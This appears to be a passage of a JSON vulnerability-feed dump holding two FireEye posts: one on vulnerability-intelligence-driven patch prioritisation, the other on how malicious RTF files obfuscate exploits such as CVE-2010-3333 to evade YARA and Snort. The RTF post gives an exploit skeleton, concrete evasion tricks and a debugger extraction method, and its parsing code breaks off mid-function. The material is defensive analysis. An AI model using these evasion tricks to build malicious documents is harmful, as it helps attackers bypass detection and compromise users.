"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "modified": "2018-07-26T10:00:00", "id": "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "href": "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T16:41:57", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nOrganizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. 
This problem is compounded by the ever-changing threat landscape and increased access to zero-days.\n\nAt FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. \n\nIn this blog post, we\u2019ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.\n\n#### Functions of Vulnerability Intelligence\n\nVulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:\n\n \nFigure 1: Vulnerability intelligence can help with risk assessment and informed decision making\n\n#### Tailoring Vulnerability Prioritization\n\nWe believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. 
A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.\n\n \nFigure 2: Patch Prioritization Philosophy\n\n#### Integration of Vulnerability Intelligence in Internal Workflows\n\nBased on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.\n\n \nFigure 3: Integration of vulnerability intelligence into internal workflows\n\n**Tools and Use Cases for Operationalizing Vulnerability Intelligence**\n\n_1\\. Automate Processes by Fusing Intelligence with Internal Data_\n\nAutomation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant [Intelligence API](<https://www.fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-subscriptions/intelligence-api.html>)) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. 
FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.\n\nSecurity teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that \u2018high\u2019 risk vulnerabilities that have an exploitation rating of \u2018available,\u2019 \u2018confirmed,\u2019 or \u2018wide\u2019 must be patched within a set number of days. Of course, the SLA will depend on the company\u2019s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. \n\nAnother potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization\u2019s unique threat profile and business operations.\n\n_2\\. 
Communicating with Internal Stakeholders_\n\nTeams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.\n\nData-informed intelligence analysis may help convince stakeholders outside of the security organization of the importance of patching quickly, even when this is inconvenient to business operations. Threat intelligence can inform an organization\u2019s appropriate use of resources for security given the potential business impact of security incidents.\n\n_3\\. Threat Modeling_\n\nOrganizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.\n\n#### Examples\n\nThe following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.\n\n_Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization_\n\nThe FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d) tool is available for customers [here](<https://fireeye.market/apps?query=five>). 
It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.\n\n \nFigure 4: FIVE Tool for Windows and MacOS\n\nIn this scenario, an organization\u2019s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. \n\n \nFigure 5: FIVE tool startup screen waiting for file input\n\n \nFigure 6: FIVE tool after successfully regexing the CVE-IDs from the file\n\nAfter selecting all CVE-IDs, the user clicked the \u201cFetch Vulnerabilities\u201d button, causing the application to make the necessary two-stage API call to the Intelligence API.\n\nThe output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye\u2019s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.\n\n \nFigure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports\n\nFIVE can also facilitate other use cases for vulnerability intelligence. 
For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization\u2019s vulnerability management program.\n\n_Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling_\n\nCVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and the Chinese espionage group APT41.\n\nIn cases like these, threat intelligence can help impacted organizations find the \u201csignal\u201d in the \u201cnoise\u201d and prioritize patching using knowledge of exploitation and the motives and targeting patterns of the threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state-sponsored group. This supports the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.\n\n_Example 3: Intelligence Reduces Unnecessary Resource Expenditure \u2014 Automating Vulnerability Prioritization and Communications_\n\nAnother common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes helps an organization discern when it is necessary to respond in an all-hands-on-deck manner.\n\nTake the case of [CVE-2019-12650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650>), originally disclosed on Sept. 
25, 2019 with an NVD rating of \u201cHigh.\u201d Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle as numerous other vulnerabilities rated High or Critical. As previously discussed, our experts reviewed the vulnerability and determined that it required the highest level of privileges available to exploit successfully, and that there was no evidence of exploitation in the wild.\n\nThis is a case where threat intelligence reporting, together with automation, can minimize the need to spin up resources unnecessarily. Although the public NVD score rated this vulnerability High, Mandiant Intelligence rated it as \u201clow\u201d risk due to the high level of privileges needed to use it and the lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability can be patched in the regular cycle and does not warrant additional resources for an out-of-band patch. When Mandiant ratings are automatically integrated into the patching ticket generation process, this supports efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the priority.\n\n#### Vulnerabilities: Managed\n\nBecause we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. 
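
The two steps that Examples 1 and 3 above describe, pulling CVE-IDs out of whatever file the scanner produced and then deciding from exploitation evidence and the privileges an attacker needs, rather than from the NVD score alone, whether a patch goes out-of-band, can be scripted. The block below is an added example: it is neither FireEye\u2019s code nor the FIVE tool. Its scan export and intelligence table are constructed for the example, the CVSS vectors in it are illustrative rather than NVD data, and the three buckets are a simple rule of thumb, not Mandiant\u2019s rating scheme.

```python
# Added example, not FireEye's or the FIVE tool's code: the two steps Examples 1 and 3
# describe, pulling CVE-IDs out of an arbitrary scan export with a regex and ranking
# them on exploitation evidence and the privileges an attacker needs rather than on
# the NVD severity alone.  The export and the intel table are constructed for the
# example; the CVSS vectors are illustrative, not NVD data, and the three buckets are
# a rule of thumb, not Mandiant's rating scheme.
import re

CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)

# constructed scan export: CSV, a JSON line and free text, with duplicates and mixed case
SCAN_EXPORT = """host,plugin,cve
srv-01,12345,cve-2019-19781
{"host": "srv-01", "cves": ["CVE-2019-12650", "CVE-2019-19781"]}
srv-01 was also flagged for CVE-2012-0158 (legacy Office) and cve-2019-12650 again
"""

# constructed intelligence records: CVE -> (CVSS v3 vector, exploited in the wild)
INTEL = {
    "CVE-2019-19781": ("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", True),
    "CVE-2019-12650": ("CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", False),
    "CVE-2012-0158": ("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", True),
}
ORDER = ("out-of-band", "review", "regular-cycle")


def extract_cves(text: str) -> list:
    """Unique CVE-IDs in first-seen order, upper-cased, from any text-readable file."""
    seen = {}
    for cve in CVE_RE.findall(text):
        seen.setdefault(cve.upper(), None)
    return list(seen)


def cvss_metrics(vector: str) -> dict:
    """Split 'CVSS:3.1/AV:N/AC:L/...' into {'AV': 'N', 'AC': 'L', ...}."""
    return dict(part.split(":", 1) for part in vector.split("/")[1:])


def bucket(vector: str, exploited: bool) -> str:
    """out-of-band: exploitation observed; review: unexploited but reachable from the
    network with no privileges; regular-cycle: everything else, e.g. PR:H and no ITW."""
    metrics = cvss_metrics(vector)
    if exploited:
        return "out-of-band"
    if metrics.get("AV") == "N" and metrics.get("PR") == "N":
        return "review"
    return "regular-cycle"


def prioritise(text: str, intel=INTEL) -> list:
    """Pair each CVE in the export with its bucket, most urgent first; a CVE with no
    intelligence record is sent to review rather than silently de-prioritised."""
    rows = []
    for cve in extract_cves(text):
        if cve in intel:
            vector, exploited = intel[cve]
            rows.append((cve, bucket(vector, exploited)))
        else:
            rows.append((cve, "review"))
    return sorted(rows, key=lambda row: ORDER.index(row[1]))


if __name__ == "__main__":
    for cve, action in prioritise(SCAN_EXPORT):
        print(f"{cve}: {action}")
```

Run against the constructed export, the Citrix and Office bugs land in the out-of-band bucket because exploitation has been observed, while CVE-2019-12650 drops to the regular cycle despite its High NVD rating because it needs PR:H and has no exploitation evidence; that is the Example 3 decision, made by the same rule every time rather than by whoever reads the headline first.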
Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.\n\nMandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps\u2014not just patching\u2014to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n\n**Additional Resources**\n\nZero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One\n\nThink Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two\n\nSeparating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three\n\nMandiant offers [Intelligence Capability Development (ICD) services](<https://www.fireeye.com/solutions/cyber-threat-intelligence.html>) to help organizations optimize their ability to consume, analyze and apply threat intelligence.\n\nThe [FIVE tool is available on the FireEye Market](<https://fireeye.market/apps?query=five>). It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. \n\nMandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. 
Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-27T12:30:00", "type": "fireeye", "title": "Putting the Model to Work: Enabling Defenders With Vulnerability\nIntelligence \u2014 Intelligence for Vulnerability Management, Part Four", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12650", "CVE-2019-19781", "CVE-2012-0158"], "modified": "2020-04-27T12:30:00", "id": "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "href": "https://www.fireeye.com/blog/threat-research/2020/04/enabling-defenders-with-vulnerability-intelligence.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-17T14:44:05", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 
years. The RTF format is very flexible and therefore complicated, which makes the development of a safe RTF parser challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can carry other vulnerabilities unrelated to the RTF parser, because RTF supports the embedding of objects such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser, and attackers can exploit them through other file formats such as DOC and DOCX just as well.\n\nAnother type of RTF malware does not use any vulnerability at all. It simply contains embedded malicious executable files and tricks the user into launching them. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer RTF as an attack vector because it is an obfuscation-friendly format. As such, their malware can easily evade static signature-based detection tools such as YARA or Snort. This is a big reason why, in this era of scriptable exploits, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs.\n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple of different RTF obfuscation strategies.\n\n**1\\. 
CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery. Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability is a stack-based buffer overflow in the routine of the Microsoft RTF parser that parses the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so the threat it posed was very high.\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n`{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}}`\n\nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after `\\sv` in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of signature-based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\nFigure 1. 
Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces, which is enough to bypass most signature-based detection: most anti-virus products failed to detect this sample on first submission to VirusTotal. Notice also the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 bytes in Figure 1 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019, and the RTF parser simply ignores them. In fact, not only are the split pieces of `\\sn` combined together, pieces of `\\sv` are combined as well. The following example demonstrates this obfuscation:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff...}}}}` | `{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff...}}}}` |\n\nWe can come up with a variety of ideas, different from the sample above, to defeat static signature-based detection.\n\n**2\\. Embedded objects**\n\nUsers can embed a variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE-related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be carried in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n[Figure: syntax of the `\\object` destination, from the RTF specification]\n\n<objtype> specifies the type of object. `\\objocx` is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. 
The data right after `\\objdata` is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n| Element | Definition |\n|---|---|\n| `<data>` | `(\\binN #BDATA) \\| #SDATA` |\n| `#BDATA` | Binary data |\n| `#SDATA` | Hexadecimal data |\n\nAttackers insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. `\\binN` can be swapped with #SDATA. The data right after `\\binN` is raw binary data. In the following example, the characters 123 are treated as binary data and hence end up as the hex values 313233 in memory.\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata \\bin3 123}` | `{\\object\\objocx\\objdata 313233}` |\n\nLet\u2019s look at another example:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123}` | `{\\object\\objocx\\objdata 313233}` |\n\nIf we call atoi or atol on the numeric parameter string in this second example, we get 0x7fffffff, while the value Word actually uses is 3 (which is exactly what 32-bit arithmetic that wraps on overflow, rather than saturating, yields for this string).\n\nThis happens because [`\\bin` takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi equivalent in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n[Figure: the decompiled numeric-parameter conversion routine of Word\u2019s RTF parser]\n\nb. `\\ucN` and `\\uN` \nBoth are ignored, and the characters right after `\\uN` are not skipped.\n\nc. The whitespace characters 0x0D (\\r), 0x0A (\\n) and 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. 
For normal use, users need to escape these symbols. Here is an incomplete list:\n\n- `\\}`\n- `\\{`\n- `\\%`\n- `\\+`\n- `\\-`\n- `\\\\`\n- `\\'hh`\n\nAll of these escaped characters are ignored, but there is an interesting situation with `\\'hh`. Let\u2019s look at an example first:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 341\\'112345 }` | `{\\object\\objocx\\objdata 342345}` |\n\nWhen parsing `\\'11`, the parser treats the 11 as an encoded hex byte. This byte is then discarded before the parser continues with the rest of objdata. The 1 preceding `\\'11` is discarded as well: once the RTF parser has read the 1 right before `\\'11`, which is the high nibble of an octet, and then immediately encounters `\\'11`, that high nibble is dropped, because the internal state for decoding the hex string into binary bytes has been reset.\n\nThe table below shows the processing procedure; the two 1s highlighted in it are the ones from `\\'11`. It is clear that the interleaved `\\'11` disorders the state variable, which causes the high nibble of the second byte to be discarded:\n\n[Figure: step-by-step decoding state for `341\\'112345`, showing the dropped high nibble]\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and that the numeric parameter associated with the control word must be a signed 16-bit or signed 32-bit integer, but the RTF parser of Microsoft Office does not strictly obey the specification. Its implementation reserves only a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. Characters beyond the maximum buffer length (0xFF) do not remain part of the control word or parameter string. 
Instead, the control word or parameter is terminated there and the rest is read as data.\n\n[Figure: two obfuscated samples, one with a control word of 0xFE letters and one with an oversized `\\bin` parameter, ahead of the objdata]\n\nIn the first obfuscated example, the length of the oversized control word is 0xFE. With the null terminator, the control word string reaches the maximum length of 0xFF, and the remaining data belongs to objdata.\n\nIn the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. With their null terminators, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last `\\objdata` control word it sees, so every one of the following yields the same object data:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 554564{\\*\\objdata 4444}54545}` | `{\\object\\objocx\\objdata 444454545}` |\n| `{\\object\\objocx\\objdata 554445\\objdata 444454545}` | `{\\object\\objocx\\objdata 444454545}` |\n| `{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}}` | `{\\object\\objocx\\objdata 444454545}` |\n\nAs we can see here, except for `\\binN`, other control words (known or unknown, with or without a group of their own) are ignored:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666}` | `{\\object\\objocx\\objdata 4444444455556666}` |\n| `{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666}` | `{\\object\\objocx\\objdata 4444444455556666}` |\n| `{\\object\\objocx\\objdata 44444444\\datastore2211 55556666}` | `{\\object\\objocx\\objdata 4444444455556666}` |\n| `{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666}` | `{\\object\\objocx\\objdata 4444444455556666}` |\n| `{\\object\\objocx\\objdata 44444444\\unknown2211 55556666}` | `{\\object\\objocx\\objdata 4444444455556666}` |\n\nThere is another special case that makes the situation a bit more complicated: the control symbol `\\*`. The RTF specification gives the following description of [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. 
`\\*` before a known control word that takes no data:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 44444444{\\*\\par314 5555}6666}` | `{\\object\\objocx\\objdata 4444444455556666}` |\n\n`\\par` is a known control word that does not accept any data. The RTF parser skips the control word, and the data that follows remains.\n\n2\\. `\\*` before a known destination that does take data:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 44444444{\\*\\datastore314 5555}6666}` | `{\\object\\objocx\\objdata 444444446666}` |\n\nThe RTF parser also recognizes `\\datastore` and knows that it accepts data, so the data that follows is consumed by `\\datastore`.\n\n3\\. `\\*` before an unknown control word:\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 44444444{\\*\\unknown314 5555}6666}` | `{\\object\\objocx\\objdata 444444446666}` |\n\n`\\unknown` is not a control word the reader knows, so the rule quoted above applies and the whole group is skipped.\n\nFor an analyst, it is difficult to manually extract embedded objects from an obfuscated RTF, and at the time of writing no public tool handles obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to an OLE2 structured storage object. Here is the prototype of OleConvertOLESTREAMToIStorage (from ole2.h):\n\n`HRESULT OleConvertOLESTREAMToIStorage(LPOLESTREAM lpolestream, IStorage *pstg, const DVTARGETDEVICE *ptd);`\n\nThe object pointed to by lpolestream contains a pointer to the OLE1 native binary data. We can set a breakpoint on OleConvertOLESTREAMToIStorage and dump out the object data, which has already been de-obfuscated by the RTF parser:\n\n[Figure: WinDbg session breaking on OleConvertOLESTREAMToIStorage and following lpolestream to the OLE1 data buffer]\n\nThe last command, `.writemem d:\\evil_objdata.bin 0e170020 L831b6`, writes a section of memory to d:\\evil_objdata.bin. You can specify any other path; 0e170020 is the start address of the memory range, and 831b6 is its size (WinDbg\u2019s `L` prefix marks a length rather than an end address).\n\nMost of the obfuscation techniques for `\\objdata` also apply to embedded images, but for images there seems to be no convenient choke point like OleConvertOLESTREAMToIStorage. 
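
Before turning to images: the rules above (section 1, 2a-f and the three `\\*` cases) can be folded into a small model of the reader that normalises an obfuscated sample without opening it in Word. The Python block below is an added example, not FireEye\u2019s code. Beyond what the post states, it assumes that Word\u2019s numeric-parameter conversion wraps modulo 2^32 (the only rule that turns the long `\\bin` parameter in 2a into 3), that a pending high nibble is dropped at `\\binN` as it is at `\\'hh`, and that non-hex text inside `\\objdata` is skipped; it also drops the whitespace between `\\sv` pieces, so the joined value reads `1;28;fff...` rather than the `1;28 ;fff...` shown in the table in section 1.

```python
# Added example, not FireEye's code: a model of the control-word handling the post
# attributes to Word's RTF reader, used to recover the effective \objdata bytes (rules
# a-f, \* cases) or the reassembled \sn/\sv shape property (section 1).  Assumed, not
# stated on the page: parameters wrap modulo 2**32 (the only rule giving 3 for the long
# \bin parameter above), a pending nibble is dropped at \binN as at \'hh, non-hex skipped.
import re

MASK32 = 0xFFFFFFFF
CTRL_BUF = 0xFF                  # control word + NUL + parameter + NUL must fit (e)
KNOWN_NO_DATA = {"par", "rtf", "shp", "sp", "object", "objocx"}  # known, take no data
WS = b" \r\n\t"                  # whitespace the reader ignores inside data (c)
HEX = b"0123456789abcdefABCDEF"
# constructed sample combining \'hh, an ignorable \*\datastore group and \binN
SAMPLE = b"{\\object\\objocx\\objdata 341\\'11{\\*\\datastore5 9999}23\\bin2 E\x01 45 }"

def word_param(digits: str) -> int:
    """Word's own atoi: wraps modulo 2**32 instead of saturating at 0x7fffffff."""
    v = 0
    for d in digits.lstrip("-"):     # sign is ignored in this model
        v = (v * 10 + int(d)) & MASK32
    return v

def tokens(rtf: bytes):
    """Yield open/close/word/bin/hexesc/esc/char tokens in the order the reader sees them."""
    i, n = 0, len(rtf)
    while i < n:
        c = rtf[i:i + 1]
        if c == b"{": yield ("open",); i += 1; continue
        if c == b"}": yield ("close",); i += 1; continue
        if c != b"\\": yield ("char", c); i += 1; continue
        i += 1
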